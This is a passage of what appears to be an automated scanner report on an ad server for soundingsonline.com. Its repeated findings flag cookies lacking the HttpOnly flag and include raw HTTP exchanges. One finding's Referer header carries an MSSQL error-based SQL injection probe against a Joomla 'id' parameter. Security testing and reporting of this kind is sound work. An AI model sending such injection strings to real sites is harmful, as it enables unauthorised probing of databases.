GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1460402778@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:54:04 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4538
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2144241339/Middle
...[SNIP]...

14.354. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1469263568@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1469263568@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1469263568@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:58:54 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4804
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/984124974/Middle/
...[SNIP]...

14.355. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1533426917@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1533426917@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1533426917@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 03:01:06 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4292
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/196625630/Middle/
...[SNIP]...

14.356. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1557625622@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1557625622@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1557625622@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:58:42 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4865
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2056801422/Middle
...[SNIP]...

14.357. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1560905621@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1560905621@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1560905621@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:56:18 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4265
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1849024089/Middle
...[SNIP]...

14.358. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1568995865@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1568995865@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1568995865@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 03:01:06 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4804
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1834529841/Middle
...[SNIP]...

14.359. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1593404407@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1593404407@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1593404407@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:56:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4509
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/282345760/Middle/
...[SNIP]...

14.360. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1593605280@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1593605280@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1593605280@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:53:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4534
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/748549693/Middle/
...[SNIP]...

14.361. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1595740909@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1595740909@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1595740909@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:53:46 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4267
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1004567232/Middle
...[SNIP]...

14.362. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1616048263@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1616048263@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1616048263@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:55:56 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4501
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1557770911/Middle
...[SNIP]...

14.363. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1618634905@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1618634905@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1618634905@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:59:16 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4554
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1560517319/Middle
...[SNIP]...

14.364. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1621737551@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1621737551@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1621737551@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 03:01:25 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4267
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1023533412/Middle
...[SNIP]...

14.365. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1676341961@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1676341961@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1676341961@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 03:01:47 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4572
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/154303626/Middle/
...[SNIP]...

14.366. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1682116568@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1682116568@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • OAX=rcHW800+NmAABp5o; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.247realmedia.com
  • NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660;path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1682116568@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Referer: http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&Itemid=111
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: oasc05139.247realmedia.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:33:04 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: OAX=rcHW800+NmAABp5o; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.247realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4263
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1806063784/Middle
...[SNIP]...

14.367. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1689149420@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1689149420@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1689149420@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:59:11 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4511
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/108361261/Middle/
...[SNIP]...

14.368. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1692074952@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1692074952@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1692074952@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
